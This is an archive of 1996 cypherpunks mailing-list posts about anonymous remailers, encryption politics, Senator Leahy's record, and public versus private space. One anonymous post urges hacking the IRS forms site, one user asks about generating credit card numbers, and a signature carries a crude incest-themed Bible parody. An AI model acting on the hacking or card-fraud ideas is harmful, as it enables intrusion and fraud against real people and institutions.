   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINED! At 1:10 AM 8/21/96, llurch@stanford.edu (Rich Graves) wrote:
! >   ----- Message body suppressed -----
! >
! 
! 
! Sounds good to me. Keep it up.
! 
! 
! --Tim May
! 
! 
! --
! [This Bible excerpt awaiting review under the U.S. Communications Decency
! Act of 1996]
! And then Lot said, "I have some mighty fine young virgin daughters. Why
! don't you boys just come on in and fuck them right here in my house - I'll
! just watch!"....Later, up in the mountains, the younger daughter said:
! "Dad's getting old. I say we should fuck him before he's too old to fuck."
! So the two daughters got him drunk and screwed him all that night. Sure
! enough, Dad got them pregnant, and had an incestuous bastard son....Onan
! really hated the idea of doing his brother's wife and getting her pregnant
! while his brother got all the credit, so he pulled out before he
! came....Remember, it's not a good idea to have sex with your sister, your
! brother, your parents, your pet dog, or the farm animals, unless of course
! God tells you to. [excerpts from the Old Testament, Modern Vernacular
! Translation, TCM, 1996]

Your sigs are better looking than his body.

>From cpadmin@toad.com  Sun Aug 25 17:33:10 1996
Received: from fat.doobie.com (remailer@fat.doobie.com [204.62.130.103]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA24941 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 17:34:00 -0700 (PDT)
Received: (from remailer@localhost) by fat.doobie.com (8.7.5/8.6.9) id RAA16531 for cypherpunks@toad.com; Sun, 25 Aug 1996 17:34:02 -0700
Date: Sun, 25 Aug 1996 17:34:02 -0700
Message-Id: <199608260034.RAA16531@fat.doobie.com>
Subject: The wisdom of the US Government
To: cypherpunks@toad.com
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Comments: Please report misuse of this automated remailing service to <remailer-admin@cajones.com>

Hacking the US Treasury web page wasn't very smart, there are much
better places to hack:

	http://www.irs.ustreas.gov/plain/forms_pubs/expert.html

Unencrypted, unauthenticated, self-extracting archive executables from
America's most beloved Governmental `service'?

>From cpadmin@toad.com  Sun Aug 25 18:01:42 1996
Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA25595 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 18:02:30 -0700 (PDT)
Received: (from shabbir@localhost) by panix3.panix.com (8.7.5/8.7/PanixU1.3) id VAA03356; Sun, 25 Aug 1996 21:02:23 -0400 (EDT)
Date: Sun, 25 Aug 1996 21:02:23 -0400 (EDT)
From: Voters Telecommunications Watch <shabbir@vtw.org>
Message-Id: <199608260102.VAA03356@panix3.panix.com>
To: cypherpunks@toad.com
Errors-To: shabbir@vtw.org
Subject:  INFO: Democratic convention chats online!  Be there! (8/25/96)

============================================================================

	       DEMOCRATIC CONVENTION ONLINE CHAT SCHEDULE!
	            LIVE CHATS FROM THE CONVENTION! 
		(DO NOT DISTRIBUTE AFTER SEPTEMBER 1, 1996)

----------------------------------------------------------------------------
Table of contents
	What's New
	Chat Schedule
	Getting Chat Software

----------------------------------------------------------------------------
WHAT'S NEW

The Democratic convention's online chat program has begun!  It's crucial
that Netizens make net concerns a high profile issue in the online chats
this year.  You can do this by showing up and simply asking the right
questions.  Does the candidate think the Communications Decency Act is
an effective method of shielding kids from material online, or parental
control?  Does the candidate support the use of privacy-enhancing 
encryption technology?  Does the candidate support program such as
THOMAS, that put government info in the hands of the people?

If you don't ask these questions, they'll never know we care.

----------------------------------------------------------------------------
CHAT SCHEDULE

[Notably missing from this schedule are Senators Patrick J. Leahy (D-VT) 
 and Russell Feingold (D-WI) and House member Jerrold Nadler (D-NY).  All
 three have impeccable cyberspace credentials and we look forward to seeing
 them online.]

All chats take place at http://ichat.dncc96.org:4080/

Monday
	08/26/96 - 4:20pm CDT Governor Lawton Chiles 
	08/26/96 - 7:15pm CDT House Candidate Michela Alioto 
	08/26/96 - 10:30pm CDT Congressman Bill Richardson 
Tuesday
	08/27/96 - 9:00am CDT Senate Candidate Houston Gordon 
	08/27/96 - 5:00pm CDT Congresswoman Nita Lowey 
Wednesday
	08/28/96 - 9:00am CDT - Senate Candidate Houston Gordon 
	08/28/96 - 10:00am CDT - Governor Gaston Caperton 
	08/28/96 - 3:00pm CDT - Senator John D Rockefeller IV 
	08/28/96 - 4:00pm CDT - Senator John Kerry 
	08/28/96 - 4:30pm CDT - Senator Harry Reid 
	08/28/96 - 9:30pm CDT - Representative Corrine Brown 
Thursday
	08/29/96 - 10:30am CDT - Senate Candidate Houston Gordon 
	08/29/96 - 2:30pm CDT - Senator Kent Conrad 
	08/29/96 - 3:30pm CDT - Representative Eliot Engel 
	08/29/96 - 6:00pm CDT - Representative Barney Frank 
	08/29/96 - 7:00pm CDT - Senators Boxer & Murray 

Don't miss this opportunity to question the newsmakers on net issues
such as free speech and privacy!  We have to ensure that they feel 
appreciated for standing up for Net issues.

----------------------------------------------------------------------------
GETTING CHAT SOFTWARE

The Democratic Convention has chosen iChat's chat software for their
interface.  To obtain a copy, simply follow the links from the main
convention homepage at http://www.dncc96.org/ to the software section.

				###
============================================================================

>From cpadmin@toad.com  Sun Aug 25 18:20:16 1996
Received: from infinity.c2.org (infinity.c2.org [140.174.185.11]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA25839 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 18:21:06 -0700 (PDT)
Received: from zirko (exit17.bluegrass.net [205.198.88.217]) by infinity.c2.org (8.7.4/8.6.9) with SMTP
Date: Sun, 25 Aug 1996 18:19:30 -0700 (PDT)
Message-Id: <199608260119.SAA22964@infinity.c2.org>
From: Lou Zirko <lzirko@c2.net>
To: cypherpunks@toad.com
X-Priority: Normal
Subject: 128-bit MSIE
X-Mailer: Pronto Secure [Ver 1.05]
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Pgprequest: signed

-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sun Aug 25 21:18:42 1996
It appears that the 128-bit download of MS Internet Explorer had 
disappeared from their website again.  Did anyone successfully download it 
and if so is it archived anywhere.

Thanks,

Lou Zirko


Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMiEJi8tPRTNbb5z9AQEKVAf+KbP/v0Yg0oTFx/PSghgApIkyMJjUkK27
mASRZvqSZzAsizxUTPuIn7qGlYpM2qQCLYYXe986zYP39sDaGEdhTpNxzixa2XN4
k+ZmuklUFPWPUwRbhxSTrjFiId38MhPYJ0zaKWdzFt8iI6UlwypD9999HC913k2F
gAjGxQW4lzEA2/juavxENiG1vGeQQ64Ms0wOP8wAdaEE0O5RSiVhlOjpqtlpamTd
Mx3DR6EKSLrz9acjB87rya6YRRtVfsjrzngOjiPMLdqhhYImYooPYNx+4vac7o92
gsEsOkh5l9u2NHfyoAcowXWUpIS9gGcstxTiWGiaDpIeSWbXj07UZw==
=hX+X
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Mon, 26 Aug 1996 18:33:45 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <199608261033.DAA02112@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
**** Address already subscribed to cypherpunks
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 27 Aug 1996 02:42:12 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199608261350.GAA13823@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

The alpha and nymrod nymservers are down due to abuse.

Last update: Mon 26 Aug 96 6:48:16 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
exon     remailer@remailer.nl.com                ***-*    17:17  99.96%
mix      mixmaster@remail.obscura.com     +-++-+--++++  2:27:19  99.95%
jam      remailer@cypherpunks.ca          *******.****  1:14:34  99.94%
nemesis  remailer@meaning.com             ************    15:42  99.93%
squirrel mix@squirrel.owl.de                     +-+-   2:27:26  99.62%
penet    anon@anon.penet.fi               ...---..--   21:06:37  99.58%
replay   remailer@replay.com              **** *++* **     5:07  99.10%
middle   middleman@jpunix.com                      --   1:34:56  99.02%
amnesia  amnesia@chardos.connix.com       -------- --   3:52:36  98.47%
lead     mix@zifi.genetics.utah.edu       +  +++++++-+    52:43  96.86%
winsock  winsock@c2.org                   ..------  -- 12:52:32  95.16%
balls    remailer@huge.cajones.com        *******# ***     4:39  92.86%
haystack haystack@holy.cow.net            * - -*#*#*      37:17  83.96%
extropia remail@miron.vip.best.com        ----     -    5:40:19  73.28%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 26 Aug 1996 22:21:18 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed f
Message-ID: <TCPSMTP.16.8.26.7.47.22.2645935021.670907@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > Published in Washington, D.C.   July 9, 1996
 > Insult to Clinton leads to 2 arrests
 > 
 > ------------------------------------------------------
 > By Ruth Larson
 > THE WASHINGTON TIMES
 > ------------------------------------------------------

 In> I think you should try a more credible paper. Say, Scientology's
 In> Freedom Magazine, rather than the Moonies'. You are of course free to
 In> believe whatever you wish.

 In> -rich

 Lets see...

 I heard that on:

 * CNN
 * Local News
 * And on a Shortwave radio broadcast.


 They might not bat 1000, but even 500 is good.


 P.J.
 pjn@nworks.com


... RAM = Rarely Adequate Memory

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 26 Aug 1996 19:15:02 +0800
To: cypherpunks@toad.com
Subject: MUD anyone?
Message-ID: <Pine.3.89.9608260847.A346-0100000@pegasus.unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


Would anyone out there be interested in helping set up a 
crypto-anarcho-capitalist MUD to play around with some of the social 
aspects of crypto-anarchy and anarcho-capitalism? I can probably hack 
together a basic lpmud in a month or two if someone has a machine which 
it could run on and which could run a mailing list for those involved. 

On the software front, there's a demo of version 0.86 of Privtool on
utopia.hacktic.nl in /pub/replay/pub/PGP/unix (or something like that),
and my mailbot is also on there somewhere. Amongst other things that
allows you to remotely maintain Web pages by sending PGP-signed email
(actually, PGP-encrypted would probably also work if you don't mind
leaving a secret key on the system with no passphrase). Doesn't yet
protect against replay attacks and there are a few known bugs but it's 
only an Alpha. If anyone wants to use it for real I can mail you a patch 
for the worst problems.

Finally, does anyone outside the US have the last few months of the list
available for ftp? I'd like to catch up on what I've missed since I
unsubscribed and using the Web archive is far too slow and expensive.

Please send replies to me directly as I'm travelling and consequently off 
the list. Looks like I'll be on a mad bus trip round New Zealand for most 
of next month so Net access will be erratic.

	Mark

|-----------------------------------------------------------------------|
|Reverend Mark Grant M.A., U.L.C.	       EMAIL: mark@unicorn.com  |
|WWW: http://www.c2.org/~mark	  	       MAILBOT: bot@unicorn.com	|
|Approximate Current Location: Melbourne, Australia			|
|-----------------------------------------------------------------------|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Tue, 27 Aug 1996 07:11:04 +0800
To: cypherpunks@toad.com
Subject: Re: USPS
In-Reply-To: <199608240345.WAA10974@mailhub.amaranth.com>
Message-ID: <Pine.BSI.3.91.960826085230.20367B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 23 Aug 1996, William H. Geiger III wrote:

> Once in place all the goverment needs to do is ban all e-mail not sent
> through their system. Add this to the outlawing of all non-keyescrowed 
> encryption, and the ability to archive all messages sent through their 
> system. Now the goverment would have total access to everything you 
> wright. 

    Why not?  I believe it is already illegal to place anything in a 
person's physical mail box that the post office hasn't processed.  For 
the sake of preserving the 'integrity and security' of the Internet I 
can see the govt. taking such future actions.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Tue, 27 Aug 1996 02:39:09 +0800
To: cypherpunks@toad.com
Subject: Public vs Private (Was: Re: Violation or Protection?)
In-Reply-To: <ae255b9d0002100491ab@[205.199.118.202]>
Message-ID: <6xzHyMz2BACP083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jul 1996 18:50:38 -0700, tcmay@got.net (Timothy C. May) wrote:
} At 11:51 PM 7/31/96, Blanc Weber wrote:
[ re: searches of visitors to "Centennial Park" in Atlanta ]
} >But if the park was a private one, would it make any difference?
} 
} Of course, which is why stores can have "bags will be searched" policies,
} restrictions about atire, and all sorts of other policies which are not
} allowed in public places.
} 
} Disneyland is a private park, and has rules which are not the rules a
} public park can have.
} 
} Put it this way, "My house, my rules."
 
As with anything, there are gray areas and boundary cases in real life 
where this is not as clear-cut as in the private/public examples TCM
has provided us in the past.  Let's look at a couple of fuzzy examples.

Years ago, I worked for a company which operated a chain of movie theatres.
A group decided to picket in front of several of our theatres.  One of the
theatres was right downtown, with the front of the building about ten feet
from the street, separated only by the city sidewalk.  Everyone agreed
that this sidewalk was clearly public, and the company couldn't control
what the picketers did on this public sidewalk.  Later, this same group
moved their picketing to another of our theatres, across town.  Here,
the theatre sat in the middle of a large parking lot, with no sidewalks
between the parking lot and the street, but a sidewalk right in front
of the building.  It seemed pretty clear that this time the sidewalk
was private property -- the company owned the entire lot, including
all the parking, the sidewalk, and the building.  On the advice of the
company's attorneys, the manager called the City Police who escorted
the picketers off the property.  The picketers took the company to court,
and won a judgement allowing them to return and requiring the company
to apologize.  The judgement was upheld on appeal -- the case mostly
hinged on the fact that there was no other reasonable place for them
to picket, since there was no sidewalk at the public street.

Another fuzzy gray area would be the common areas in shopping malls --
the large corridors outside the stores, with fountains and park benches
and payphones and trees and public performance areas.  These spaces 
are the evolutionary replacement of the urban downtown public spaces.
Yes, they are technically private property, and the property owners
are careful not to jeopardize that status, with carefully worded public
signage, and detailed procedures for their rent-a-cops' dealings with
the members of the public.  Yet at the same time, the management also
carefully cultivates the image of their common space as the cool place
for trendy young people to want to gather.  Various skirmishes are 
occasionally fought over such questions as soliciting petition signatures
or giving out free printed information in these spaces.  

This is a market-driven mutation of the notion of common spaces, away 
from the publicly-owned town square, toward the corporately-owned.
TCM's mention of Disneyland is right on target.

} > I mean, either it is, or it isn't, a "right".   When could it really be
} >okay to violate that definition.  How are the law enforcers to do their
} >job if they can't intrude into your shopping bag, when it's a critical
} >National Emergency.  This is what Denning is always referring to.
} 
} One needs to distinguish "rights" vis-a-vis government actions, and the
} policies of private actors. The usual point about "freedom of speech"
} applies. E.g., Blanc has "freedom of speech," but not inside Microsoft.
} 
} Not to lecture, but this frequent blurring of public vs. private areas, of
} government vs. corporate actions, of "property rights," is  hurting the
} cause of liberty.

This is true in perhaps more ways than those so far discussed.
The cause of liberty is broad: it embraces Mr. May's freedom to run his
hypothetical business by his own rules, dictating what his employees may
and may not do using his computers and firing them if he doesn't like
the color of their tie; it also embraces the freedom of surly youths
and old codgers to hang out somewhere, up to no particular good and
espousing unpopular or pig-headedly-wrong opinions, frightening horses
and small children.  

The "frequent blurring of public vs. private areas" is partly due to
fuzzy-headed thinking by the public at large.  It is also partly due
to deliberate blurring by powerful & cynical forces whose causes are
furthered by the resulting confusion and by the incremental restrictions
on unapproved liberties.  A corporation might see more revenue and 
decreased repair/security/PR costs, if they can reduce the number of
teenagers skateboarding and smoking cigarettes outside their doors.
An ambitious citycouncilman or district attorney might see more favorable
publicity and advancement to more powerful positions, if they can control
irritating protest rallies and disagreeable eccentrics impairing the
"quality of life" in their jurisdictions.

One direct means to this intentional "blurring" is the current trend of
"privatizing" various government activities.  A city-owned public library
is open to basicly anyone (or recently at least anyone who can prove they
are a resident of that city).  A privately-operated public library may
and will exclude undesirable persons arbitrarily.  A state park is open
to basicly anyone, with few restrictions on what is illegal activity
therein; a Disney-operated private theme-park is a quite different.

Expect more of this privatization, in more areas of life.
For example, in East Lansing the Downtown Development initiative has
"revitalized" a couple blocks of downtown:  what was formerly a parking
lot and a small city park and a few decayed storefronts, is now a shiny
new hotel/commercial complex complete with a "fountain square" containing
some benches and sidewalks and trees.  The catch?  Fountain Square is 
owned by the hotel, and anyone named by hotel security guards as
undesirable is removed therefrom by the city police for trespassing on
private property.  Gone is the former city park.

:::::::::::::::::::::::::::::::::::::: It is much easier for an arbitrary
:: Lou Poppler <lwp@mail.msen.com>  :: intelligence to pass the Turing Test
::      http://www.msen.com/~lwp/   :: via email rather than via live chat.
::::::::::::::::::::::::::::::::::::::  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 27 Aug 1996 02:38:17 +0800
To: Mike Howell <451degree@msn.com>
Subject: Re: your mail
In-Reply-To: <UPMAIL01.199608241925150568@msn.com>
Message-ID: <Pine.SCO.3.93.960826094019.6590A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 24 Aug 1996, Mike Howell wrote:

> Does anybody know what I can get for generating the credit card numbers?
> 

Two to ten, if this is your first offense.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 27 Aug 1996 10:00:58 +0800
To: cypherpunks@toad.com
Subject: GIFs of Observer [UK] anti-Net, anti-Remailer fear-mongering
Message-ID: <Pine.GUL.3.95.960826094500.21613A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Mon, 26 Aug 1996 09:44:24 -0700 (PDT)
From: Rich Graves <rich@c2.org>
To: fight-censorship@vorlon.mit.edu
Subject: Observer anti-Net story on the web

Blatant copyright violation at:

 http://scallywag.com/

It's a couple of 105K GIFs. US Copyright terrorists may wish to mirror this
information lest the intrepid Scallywag melt down.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 27 Aug 1996 09:45:22 +0800
To: cypherpunks@toad.com
Subject: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <Pine.SUN.3.91.960826094918.6129F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 26 Aug 1996 12:23:57 -0400
From: Jonah Seiger <jseiger@cdt.org>
To: Declan McCullagh <declan@eff.org>
Cc: shabbir@vtw.org, fight-censorship@vorlon.mit.edu, brock@well.com,
    telstar@wired.com
Subject: Re: INFO: Democratic convention chats online! Be there! (8/25/96)

Declan:

What are you thinking?!

In a world where we have very few real friends, I simply don't understand
what you are trying to accomplish. It's fine (and healthy) to raise
concerns about the particular positions a member of Congress takes (hell, I
don't agree with everything Leahy does), but to simply dismiss Leahy as a
'no friend of the Net'  is naive and counterproductive.

Look at the record. Leahy is hands down the strongest supporter of the Net
in Congress. Period. No other Member (including our small but growing
handful of other friends like Burns, White, Wyden, Cox, Eshoo, etc) has
been a more forceful or consistent advocate for your causes for as long as
Leahy has. What exactly do you want? Perhaps we should elect you to
Congress and see how well you can do.

Of course we are not going to agree with our friends on every issue. If
Leahy takes a position you don't like, I'd suggest you talk to his office.
I have found in my experience that Leahy's staff (and him personally) will
take the time to listen when presented with a well presented argument.

I'm also confused about another thing: which hat were you wearing when you
wrote this? If it is your "advocate" hat I think it must covering your
eyes. If it's your "journalist" hat, you need to do a bit better job of
checking your facts in the future.

Go a head and reject the "Beltway politicians". It's fashionable, sure, but
what does it really accomplish?  Some of them are dangerous. Others are
sympathetic. The fact is that short of armed rebellion they are going to be
here for a while.
I shudder to think of the wrath our opponents could wage if we all threw up
our hands packed up our bags and left town.

Face the facts. Members of Congress have a lot of constituencies to deal
with, and we are a small and relatively powerless faction. We can do a lot
to change the outcomes of policy debates (if I didn't believe that I
wouldn't be doing what I do everyday), but we have to be realistic,
recognize where we fit in to the process and who are friends are.  One
thing's for sure - we have A LOT more enemies than we have friends.

Most members of Congress don't really understand us or our issues.  Many
are willing to learn, and some have been real champions for our causes.
But none of them are gong to continue reaching out a hand to us if we bark
and bite when we don't get 100% of our way. Zealots rarely win (though it
sure is fun to throw bombs).

Sorry for the public thrashing, but this kind of attitude REALLY gets under
my skin.

Flames welcome (though response is not guaranteed <g>),

Jonah

At 6:45 PM 8/25/96, Declan McCullagh wrote:
>On Sun, 25 Aug 1996, Voters Telecommunications Watch wrote:
>> [Notably missing from this schedule are Senators Patrick J. Leahy (D-VT)
>>  and Russell Feingold (D-WI) and House member Jerrold Nadler (D-NY).  All
>>  three have impeccable cyberspace credentials and we look forward to seeing
>>  them online.]
>
>As Shabbir and Steve know, I'm a huge fan of VTW and congratulate them for
>their successful efforts to keep netizens up-to-date on what's happening
>in the meatspace body politic.
>
>But VTW's statement above is, unfortunately, untrue and misleading.
>
>Even though Sen. Leahy opposed the CDA, his stance on privacy illustrates
>that his "cyberspace credentials" are anything but impeccable. His crypto
>bill, introduced before Pro-CODE, would liberalize some export controls
>but impose new and unprecedented criminal penalties for the use of crypto
>associated with a crime. Worse yet, as recently as this month Leahy has
>been clamoring to fund the invasive wiretapping legislation ("Digital
>Telephony") he shepherded through Congress two years ago.
>
>Equally distressingly, Leahy demonstrated his "impeccable cyberspace
>credentials" by cosponsoring the Senate online copyright bill -- aka the
>Hollywood Media Mafia's wet dream. (Yes, these are the same rapacious
>folks who are demanding that the Boy Scouts and summer camps pay cash to
>sing "God Bless America" and "Puff the Magic Dragon.") Opposed by the
>American Library Association, EFF, and teachers' organizations, Leahy's
>bill would slam fair use rights online and could make it a crime to
>browse the Net without a license.
>
>When VTW heralds Leahy as a friend of the Net with "impeccable cyberspace
>credentials," they do the Net a disservice. Leahy is in no way a true
>friend of the Net; I don't know of any Beltway politican who is.
>
>-Declan
>
>
>// declan@eff.org // I do not represent the EFF // declan@well.com /

  ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT **
      It's not too late to be a part of history -- Join the Lawsuit
         <http://www.cdt.org/ciec>   --    <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
PGP Key via finger                                     (v) +1.202.637.9800
http://www.cdt.org/                                    (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 27 Aug 1996 10:26:11 +0800
To: cypherpunks@toad.com
Subject: Re: USPS
Message-ID: <ae4723f1010210042224@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:54 PM 8/26/96, Bruce M. wrote:
>On Fri, 23 Aug 1996, William H. Geiger III wrote:
>
>> Once in place all the goverment needs to do is ban all e-mail not sent
>> through their system. Add this to the outlawing of all non-keyescrowed
>> encryption, and the ability to archive all messages sent through their
>> system. Now the goverment would have total access to everything you
>> wright.
>
>    Why not?  I believe it is already illegal to place anything in a
>person's physical mail box that the post office hasn't processed.  For
>the sake of preserving the 'integrity and security' of the Internet I
>can see the govt. taking such future actions.

I'm skeptical of this analogy (that it could be used to take control of e-mail).

The postal mailboxes that the Postal Service claims to control are those
that are either marked "U.S. Mail" or fit the form and function typically
associated with a "mailbox." A box standing on a post by the side of the
road near one's house, for example. Often saying something about "Approved
by the U.S. Postal Service," blah blah. The Postal Service has nominal
ownership of these boxes, even when installed by customers (as is the norm,
of course).

(This comes up in one major way: non-Postal Service deliveries are not
supposed to be made into such boxes. Secondly, there are limits on what
customers can do to "defend" these boxes against vandals...this has come up
in discussions of placing a small box inside a large box and filling the
space between with cement, to break the arms of hooligans who play "mailbox
baseball.")

Anyone is free to place boxes on their property marked "For Federal Express
Deliveries," "For Packages from Neighbors," etc. Or to rent "Mailboxes,
Etc."-type boxes.

These latter examples are analogous to e-mail accounts folks have at
various ISPs. Or to Mailboxes, Etc.-type rental boxes.

The Postal Service has limited jurisdiction over rental mailboxes, and even
less authority over my placing of a "UPS leave stuff here" box on my porch.

Thus, I don't seen the analogy as giving the Postal Service more sweeping
powers over e-mail than they already have over physical deliveries. And
given the already-anarchic and already-distributed nature of e-mail, it's
hopeless.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
